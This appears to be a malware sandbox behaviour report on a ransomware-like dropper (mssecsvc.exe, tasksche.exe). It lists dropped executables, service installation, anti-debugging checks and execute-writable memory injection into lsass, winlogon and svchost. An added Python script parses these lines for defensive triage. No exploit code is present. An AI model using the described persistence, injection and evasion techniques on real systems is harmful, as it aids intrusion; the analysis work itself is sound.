              Source: mssecsvc.exe | String found in binary or memory: O\Device\HarddiskVolume2\Windows\Temp\avg_a04160\avg-secure-search-installer.exe
              Source: mssecsvc.exe | String found in binary or memory: O\Device\HarddiskVolume2\Windows\Temp\avg_a01924\avg-secure-search-installer.exe2
              Source: mssecsvc.exe | String found in binary or memory: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-IIS-WebServer-AddOn-2-Pa
              Source: mssecsvc.exe | String found in binary or memory: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Server-Help-Package.ClientUltimate~31bf385
              Source: mssecsvc.exe | String found in binary or memory: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-IIS-WebServer-AddOn-Pack
              Source: mssecsvc.exe | String found in binary or memory: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Help-CoreClientUAUE-Pack
              Source: mssecsvc.exe | String found in binary or memory: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Help-Customization-Packa
              Source: mssecsvc.exeString found in binary or memory: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-StarterEdition-wrapper~3
              Source: mssecsvc.exeString found in binary or memory: O\Device\HarddiskVolume2\Windows\Temp\avg_a04392\avg-secure-search-installer.exe
Source: C:\Windows\mssecsvc.exe | File read: C:\Windows\System32\drivers\etc\hosts (reported 4 times)
Source: C:\Windows\System32\backgroundTaskHost.exe | File read: C:\Windows\System32\drivers\etc\hosts (reported 2 times)
Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts (reported 2 times)
Source: y2jb4FtSNq.dll | Static file information: File size 5267459 > 1048576
Source: y2jb4FtSNq.dll | Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x501000
Source: C:\Windows\tasksche.exe | Code function: 31_2_00407710 push eax; ret 31_2_0040773E
Source: C:\Windows\tasksche.exe | Code function: 31_2_004076C8 push eax; ret 31_2_004076E6
Source: mssecsvc.exe.2.dr | Static PE information: section name: jirjvcn
Source: C:\Windows\mssecsvc.exe | Code function: 4_2_00AC3D36 LoadLibraryA,GetProcAddress,LoadLibraryA,GetTickCount,GetVolumeInformationA,GetModuleFileNameA,wsprintfA,CreateThread,CloseHandle,CreateThread,CloseHandle,CreateEventA,socket,connect,GetVersionExA,wsprintfA,CreateThread,CloseHandle,GetTickCount

              Persistence and Installation Behavior

Source: C:\Windows\SysWOW64\rundll32.exe | Executable created and started: C:\WINDOWS\mssecsvc.exe
Source: C:\Windows\mssecsvc.exe | Executable created and started: C:\WINDOWS\tasksche.exe
Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Windows\mssecsvc.exe (reported 2 times)
Source: C:\Windows\mssecsvc.exe | File created: C:\Windows\tasksche.exe (reported 2 times)
Source: C:\Windows\mssecsvc.exe | Code function: 4_2_00407C40 sprintf,OpenSCManagerA,InternetCloseHandle,CreateServiceA,CloseServiceHandle,StartServiceA,CloseServiceHandle,CloseServiceHandle
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX (reported 3 times)
Source: C:\Windows\mssecsvc.exe | Process information set: NOOPENFILEERRORBOX (reported 4 times)

              Malware Analysis System Evasion

Source: C:\Windows\mssecsvc.exe | Special instruction interceptor: First address: 0000000000A6B538 instructions caused by: Self-modifying code
Source: C:\Windows\mssecsvc.exe | Code function: 4_2_00AC4178
Source: C:\Windows\mssecsvc.exe | Code function: 4_2_7FEA4178
Source: C:\Windows\System32\svchost.exe TID: 5608 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5836 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\mssecsvc.exe | Code function: 4_2_00AC042D rdtsc
Source: C:\Windows\System32\svchost.exe | File opened: PhysicalDrive0
Source: C:\Windows\mssecsvc.exe | Process information queried: ProcessInformation
Source: C:\Windows\System32\loaddll32.exe | Thread delayed: delay time: 120000
Source: C:\Windows\System32\backgroundTaskHost.exe | File opened: C:\Windows\System32\TileDataRepository.dll
Source: C:\Windows\System32\backgroundTaskHost.exe | File opened: C:\Windows\system32\Windows.StateRepository.dll
Source: C:\Windows\System32\backgroundTaskHost.exe | File opened: C:\Windows\System32\ContentDeliveryManager.Utilities.dll
Source: C:\Windows\System32\backgroundTaskHost.exe | File opened: C:\Windows\SYSTEM32\usermgrcli.dll
Source: C:\Windows\System32\backgroundTaskHost.exe | File opened: C:\Windows\system32\StateRepository.Core.dll
Source: C:\Windows\System32\backgroundTaskHost.exe | File opened: C:\Windows\System32\usermgrproxy.dll
Source: dwm.exe, 0000001A.00000002.792323220.0000026F19D40000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VEN_15AD&DEV_07A0&SUBSYS_07A015AD&REV_01\3&61aaa01&0&C7ACPI\PNP0200\4&1bd7f811&0ROOT\UMBUS\0000SCSI\Disk&Ven_VMware&Prod_Virt+
Source: svchost.exe, 0000000F.00000002.791275614.000001BC27436000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: (@vmicheartbeat
Source: svchost.exe, 00000021.00000000.360470749.00000219BFEB5000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: (@Allow inbound TCP port 636 traffic for vmicheartbeatLMEMp
Source: dwm.exe, 0000001A.00000002.796029603.0000026F1A010000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000O
Source: svchost.exe, 00000021.00000000.357765748.00000219BF80B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: ,@Block any other outbound traffic for vmicheartbeat
Source: svchost.exe, 00000021.00000000.357765748.00000219BF80B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: ,@vmicheartbeat-block-out
Source: mssecsvc.exe | Binary or memory string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Hyper-V-Common-Drivers-Package~3
Source: mssecsvc.exe, 00000004.00000000.263399045.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 00000004.00000002.499291701.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 00000008.00000000.265918603.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 00000008.00000002.348690021.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 0000000C.00000000.275826042.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 0000000C.00000002.351059064.0000000000710000.00000080.00000001.01000000.00000004.sdmp, tasksche.exe, 0000001F.00000000.342421890.0000000000410000.00000002.00000001.01000000.00000007.sdmp, y2jb4FtSNq.dll, tasksche.exe.8.dr, mssecsvc.exe.2.dr | Binary or memory string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Hyper-V-Guest-Integration-Drivers-Package~31bf3856ad364e35~x86~~6.1.7601.17514.cat
Source: svchost.exe, 00000021.00000000.360470749.00000219BFEB5000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: (@Allow outbound TCP traffic for vmicheartbeatLMEM`
Source: mssecsvc.exe, 00000008.00000002.351098719.0000000000D57000.00000004.00000020.00020000.00000000.sdmp, mssecsvc.exe, 00000008.00000002.351313232.0000000000DA1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.785675445.000001A291628000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.300410315.000001A291628000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.294275035.000001A291628000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.674409764.00000159F6C2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.675624500.00000159FC254000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000021.00000000.357765748.00000219BF80B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Block any other inbound traffic for vmicheartbeat
Source: svchost.exe, 00000021.00000000.357765748.00000219BF80B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: ,@vmicheartbeat-allow-out
Source: svchost.exe, 00000021.00000000.357765748.00000219BF80B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: $@vmicvss-block-out
Source: svchost.exe, 00000021.00000000.360470749.00000219BFEB5000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: (@Allow outbound TCP traffic for vmicheartbeatLMEM`P
Source: dwm.exe, 0000001A.00000000.309719728.0000026F1A051000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&1EC51BF7&0&000000
Source: svchost.exe, 00000016.00000002.784873696.0000025E76048000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
Source: svchost.exe, 00000021.00000000.357765748.00000219BF80B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: .@vmicshutdown-block-in
Source: dwm.exe, 0000001A.00000002.789069661.0000026F1791C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000008
Source: svchost.exe, 00000021.00000002.792446204.00000219BF800000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: $@Allow outbound TCP traffic for vmicheartbeat
Source: svchost.exe, 00000021.00000000.360470749.00000219BFEB5000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: (@Allow inbound TCP port 389 traffic for vmicheartbeatLMEMp
Source: svchost.exe, 00000027.00000002.786558352.000002631D63F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000027.00000000.389828938.000002631D63F000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: (@Microsoft-Windows-Hyper-V-Hypervisor
Source: svchost.exe, 00000023.00000002.788068180.0000029A96A29000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000_0r
Source: svchost.exe, 0000000F.00000000.292405111.000001BC27288000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: @SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&1EC51BF7&0&000000
Source: mssecsvc.exe, 00000004.00000000.263399045.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 00000004.00000002.499291701.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 00000008.00000000.265918603.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 00000008.00000002.348690021.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 0000000C.00000000.275826042.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 0000000C.00000002.351059064.0000000000710000.00000080.00000001.01000000.00000004.sdmp, tasksche.exe, 0000001F.00000000.342421890.0000000000410000.00000002.00000001.01000000.00000007.sdmp, y2jb4FtSNq.dll, tasksche.exe.8.dr, mssecsvc.exe.2.dr | Binary or memory string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Hyper-V-Common-Drivers-Package~31bf3856ad364e35~x86~~6.1.7601.17514.catp
Source: svchost.exe, 0000000F.00000000.293363867.000001BC27C00000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: vmicshutdown
Source: svchost.exe, 00000021.00000000.357765748.00000219BF80B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: &@vmicheartbeat-allow-in-1
Source: svchost.exe, 0000000F.00000000.281621488.000001BC27436000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: vmicvss
Source: svchost.exe, 0000000F.00000002.791275614.000001BC27436000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: $@vmicshutdown
Source: svchost.exe, 00000021.00000000.357765748.00000219BF80B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: ,@vmicvss
Source: svchost.exe, 00000027.00000003.675884026.000002631EA53000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware
Source: svchost.exe, 00000016.00000002.785226651.0000025E7605B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: (@SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&1EC51BF7&0&000000
Source: svchost.exe, 00000021.00000000.357765748.00000219BF80B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: ,@Allow inbound TCP port 389 traffic for vmicheartbeat
Source: svchost.exe, 00000021.00000000.357765748.00000219BF80B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: @vmicshutdown
Source: svchost.exe, 0000000F.00000000.293363867.000001BC27C00000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: vmicheartbeat
Source: svchost.exe, 00000021.00000000.357765748.00000219BF80B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: ,@vmicshutdown-block-out
Source: svchost.exe, 00000021.00000000.357765748.00000219BF80B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: &@vmicheartbeat-block-in
Source: lsass.exe, 0000000B.00000000.280986933.0000025D3327E000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: pvmicvssNT SERVICE
Source: svchost.exe, 00000027.00000000.394201292.000002631E28B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMwareVirtual disk2.0NULLSCSI0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\4&2509f6e&0&00A8
Source: svchost.exe, 00000021.00000000.357765748.00000219BF80B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: "@Block any outbound traffic for vmicvss
Source: lsass.exe, 0000000B.00000000.271534520.0000025D33213000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000000.280867900.0000025D33213000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000B.00000002.783948222.0000025D33213000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000002.783516257.0000029B07628000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.785715887.000001A4BAC64000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.784070090.0000028416C29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000021.00000002.788615829.00000219BE6B4000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000000.356180810.00000219BE6B4000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000022.00000002.783810031.000001CC4D229000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000022.00000000.365673118.000001CC4D229000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000000.372190291.0000029A96A40000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: svchost.exe, 00000021.00000000.360470749.00000219BFEB5000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: @Allow inbound TCP port 636 traffic for vmicheartbeatLMEMp
Source: lsass.exe, 0000000B.00000000.280986933.0000025D3327E000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: pvmicshutdownNT SERVICE
Source: svchost.exe, 00000021.00000002.792446204.00000219BF800000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: @Block any inbound traffic for vmicshutdown
Source: svchost.exe, 0000001D.00000002.675684049.00000159FC261000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: "@Hyper-V RAW
Source: svchost.exe, 00000021.00000000.357765748.00000219BF80B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: .@vmicshutdown
Source: svchost.exe, 00000021.00000000.357765748.00000219BF80B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: .@vmicheartbeat-allow-in-2
Source: svchost.exe, 00000021.00000000.357765748.00000219BF80B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: @vmicvss
Source: svchost.exe, 00000021.00000000.357765748.00000219BF80B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: $@vmicheartbeat
Source: svchost.exe, 00000021.00000000.357765748.00000219BF80B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: .@vmicheartbeat
Source: svchost.exe, 00000027.00000002.786558352.000002631D63F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000027.00000000.389828938.000002631D63F000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: $Microsoft-Windows-Hyper-V-Hypervisor
Source: svchost.exe, 00000010.00000002.782222088.0000029B07602000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
Source: lsass.exe, 0000000B.00000000.280986933.0000025D3327E000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: pvmicheartbeatNT SERVICE
Source: svchost.exe, 00000021.00000002.792446204.00000219BF800000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: (@Block any outbound traffic for vmicshutdown
Source: mssecsvc.exe | Binary or memory string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Hyper-V-Guest-Integration-Driver
Source: svchost.exe, 00000021.00000000.357765748.00000219BF80B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: .@Allow inbound TCP port 636 traffic for vmicheartbeat
Source: svchost.exe, 00000021.00000000.360470749.00000219BFEB5000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: @Allow inbound TCP port 389 traffic for vmicheartbeatLMEMp
Source: svchost.exe, 00000021.00000000.357765748.00000219BF80B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: $@Block any inbound traffic for vmicvss
Source: svchost.exe, 00000027.00000003.675884026.000002631EA53000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: nonicVMware Virtual disk 2.0 NULL
Source: svchost.exe, 00000021.00000000.357765748.00000219BF80B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: ,@vmicvss-block-in
Source: svchost.exe, 00000021.00000000.357765748.00000219BF80B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: @vmicheartbeat
Source: C:\Windows\mssecsvc.exe | Code function: 4_2_00AC3D36 LoadLibraryA,GetProcAddress,LoadLibraryA,GetTickCount,GetVolumeInformationA,GetModuleFileNameA,wsprintfA,CreateThread,CloseHandle,CreateThread,CloseHandle,CreateEventA,socket,connect,GetVersionExA,wsprintfA,CreateThread,CloseHandle,GetTickCount
Source: C:\Windows\tasksche.exe | Code function: 31_2_004029CC free,GetProcessHeap,HeapFree
Source: C:\Windows\mssecsvc.exe | Code function: 4_2_00AC042D rdtsc
Source: C:\Windows\mssecsvc.exe | Process token adjusted: Debug (reported 2 times)
Source: C:\Windows\mssecsvc.exe | Code function: 4_2_00AC05F2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\mssecsvc.exe | Code function: 4_2_00AC042D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\mssecsvc.exe | Code function: 4_2_00AC025E mov edx, dword ptr fs:[00000030h]
Source: C:\Windows\mssecsvc.exe | Code function: 4_2_7FEA05F2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\mssecsvc.exe | Code function: 4_2_7FEA025E mov edx, dword ptr fs:[00000030h]
Source: C:\Windows\mssecsvc.exe | Code function: 4_2_7FEA042D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\mssecsvc.exe | Process queried: DebugPort
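
The behaviour lines in this report are easier to act on once they are structured. The Python script below is an added example, not part of the Joe Sandbox report and not Joe Sandbox tooling: it parses lines of the form "Source: <process> <event>: <detail>", whether the columns are fused as extracted or separated by "|", and reduces them to what a responder needs first: the executables dropped and started, the code function that pairs CreateServiceA with StartServiceA (4_2_00407C40 above), which processes read the hosts file, the anti-analysis indicators (rdtsc, PEB reads via fs:[30h], DebugPort queries, sleep delays) and the processes that receive the execute-and-write section mappings listed under HIPS / PFW / Operating System Protection Evasion. The event names, regular expressions and category labels are this example's own assumptions about the line layout, not a documented Joe Sandbox schema; the sample lines are copied from this report.

```python
"""Reduce Joe Sandbox behaviour lines to a triage summary (added example).

Assumptions of this script, not a Joe Sandbox schema: lines read
"Source: <process> <event>: <detail>", possibly with fused columns and a
trailing "Jump to ..." link caption from page extraction.
"""
import re
from collections import Counter
from dataclasses import dataclass
from typing import Iterable, Optional

# Constructed input: lines copied from this report in their extracted form.
SAMPLE_LINES = r"""
Source: C:\Windows\SysWOW64\rundll32.exeExecutable created and started: C:\WINDOWS\mssecsvc.exeJump to behavior
Source: C:\Windows\mssecsvc.exeExecutable created and started: C:\WINDOWS\tasksche.exeJump to behavior
Source: C:\Windows\mssecsvc.exeCode function: 4_2_00407C40 sprintf,OpenSCManagerA,InternetCloseHandle,CreateServiceA,CloseServiceHandle,StartServiceA,CloseServiceHandle,CloseServiceHandle,4_2_00407C40
Source: C:\Windows\mssecsvc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\mssecsvc.exeCode function: 4_2_00AC042D rdtsc 4_2_00AC042D
Source: C:\Windows\mssecsvc.exeCode function: 4_2_00AC05F2 mov eax, dword ptr fs:[00000030h]4_2_00AC05F2
Source: C:\Windows\mssecsvc.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5608Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: C:\Windows\System32\lsass.exe protection: execute and read and writeJump to behavior
Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: C:\Windows\System32\svchost.exe protection: execute and read and writeJump to behavior
Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: C:\Windows\System32\svchost.exe protection: execute and read and writeJump to behavior
Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
barindex
"""

EVENT_NAMES = (
    "Executable created and started", "File created", "File read", "Code function",
    "Section loaded", "Process queried", "Process token adjusted", "Thread sleep time",
    "Thread delayed", "Special instruction interceptor",
    "String found in binary or memory", "Binary or memory string",
)
# The lazy source match stops at the first known event name, so fused and
# "|"-separated columns both parse; a trailing link caption is discarded.
LINE_RE = re.compile(
    r"^\s*Source:\s*(?P<src>.+?)\s*(?:\|\s*)?(?P<event>"
    + "|".join(re.escape(e) for e in EVENT_NAMES)
    + r"):\s*(?P<detail>.*?)\s*(?:Jump to behavior|Jump to dropped file)?\s*$"
)
# "4_2_00AC042D rdtsc 4_2_00AC042D": function id, body, optional repeated id.
CODE_FN_RE = re.compile(r"^(?P<fid>\d+_\d+_[0-9A-Fa-f]{8})\s*(?P<body>.*?)(?:\s*(?P=fid))?\s*$")
SECTION_RE = re.compile(r"^(?P<section>\S+)\s+target:\s+(?P<target>.+?)\s+protection:\s+(?P<prot>.+)$")
PEB_RE = re.compile(r"fs:\[0*30h\]", re.IGNORECASE)  # TEB->PEB read, the usual BeingDebugged route
SERVICE_CREATE = {"CreateServiceA", "CreateServiceW"}
SERVICE_START = {"StartServiceA", "StartServiceW"}


@dataclass
class Event:
    source: str
    event: str
    detail: str


def basename(path: str) -> str:
    return path.replace("/", "\\").rstrip("\\").rsplit("\\", 1)[-1]


def parse_line(line: str) -> Optional[Event]:
    m = LINE_RE.match(line)
    return Event(m["src"], m["event"], m["detail"]) if m else None


def split_code_function(detail: str):
    """Return (function id, body) with the repeated trailing id removed."""
    m = CODE_FN_RE.match(detail)
    return (m["fid"], m["body"]) if m else (None, detail)


def summarize(lines: Iterable[str]) -> dict:
    s = {
        "dropped_and_started": [],       # (dropping process, path started)
        "service_install_functions": [],  # functions that both create and start a service
        "hosts_file_readers": set(),
        "anti_analysis": Counter(),
        "injection_targets": Counter(),   # processes that received a mapped section
        "rwx_injections": 0,
    }
    for raw in lines:
        ev = parse_line(raw)
        if ev is None:
            continue  # headings, link residue, blank lines
        src = basename(ev.source)
        if ev.event == "Executable created and started":
            s["dropped_and_started"].append((src, ev.detail))
        elif ev.event == "File read" and ev.detail.lower().endswith(r"\drivers\etc\hosts"):
            s["hosts_file_readers"].add(src)
        elif ev.event == "Code function":
            fid, body = split_code_function(ev.detail)
            apis = {a.strip() for a in body.split(",") if a.strip()}
            if apis & SERVICE_CREATE and apis & SERVICE_START:
                s["service_install_functions"].append(fid)
            if "rdtsc" in body.split():
                s["anti_analysis"]["rdtsc timing"] += 1
            if PEB_RE.search(body):
                s["anti_analysis"]["PEB read via fs:[30h]"] += 1
        elif ev.event == "Process queried" and ev.detail == "DebugPort":
            s["anti_analysis"]["DebugPort query"] += 1
        elif ev.event in ("Thread sleep time", "Thread delayed"):
            s["anti_analysis"]["sleep delay"] += 1
        elif ev.event == "Section loaded":
            m = SECTION_RE.match(ev.detail)
            if m:
                s["injection_targets"][basename(m["target"])] += 1
                if "execute" in m["prot"] and "write" in m["prot"]:
                    s["rwx_injections"] += 1
    return s


def summarize_text(text: str) -> dict:
    return summarize(text.splitlines())


if __name__ == "__main__":
    for key, value in summarize_text(SAMPLE_LINES).items():
        print(f"{key}: {dict(value) if isinstance(value, Counter) else value}")
```

Run it as a script to print the summary for the embedded lines, or pass a saved report's lines to summarize(); unrecognised lines such as "barindex" are skipped rather than raising, and the repeated trailing function id that extraction leaves on "Code function" lines is stripped before the API list is split.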

              HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\mssecsvc.exe | Section loaded: \BaseNamedObjects\axytVt target: C:\Windows\System32\winlogon.exe protection: execute and read and write
Source: C:\Windows\mssecsvc.exe | Section loaded: \BaseNamedObjects\axytVt target: C:\Windows\System32\lsass.exe protection: execute and read and write
Source: C:\Windows\mssecsvc.exe | Section loaded: \BaseNamedObjects\axytVt target: C:\Windows\System32\fontdrvhost.exe protection: execute and read and write
Source: C:\Windows\mssecsvc.exe | Section loaded: \BaseNamedObjects\axytVt target: C:\Windows\System32\svchost.exe protection: execute and read and write (reported 4 times)
Source: C:\Windows\mssecsvc.exe | Section loaded: \BaseNamedObjects\axytVt target: C:\Windows\System32\fontdrvhost.exe protection: execute and read and write
Source: C:\Windows\mssecsvc.exe | Section loaded: \BaseNamedObjects\axytVt target: C:\Windows\System32\dwm.exe protection: execute and read and write
Source: C:\Windows\mssecsvc.exe | Section loaded: \BaseNamedObjects\axytVt target: C:\Windows\System32\svchost.exe protection: execute and read and write (reported 9 times)
Source: C:\Windows\mssecsvc.exe | Section loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and write (reported 43 times)
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\axytVt target: unknown protection: execute and read and writeJump to behavior
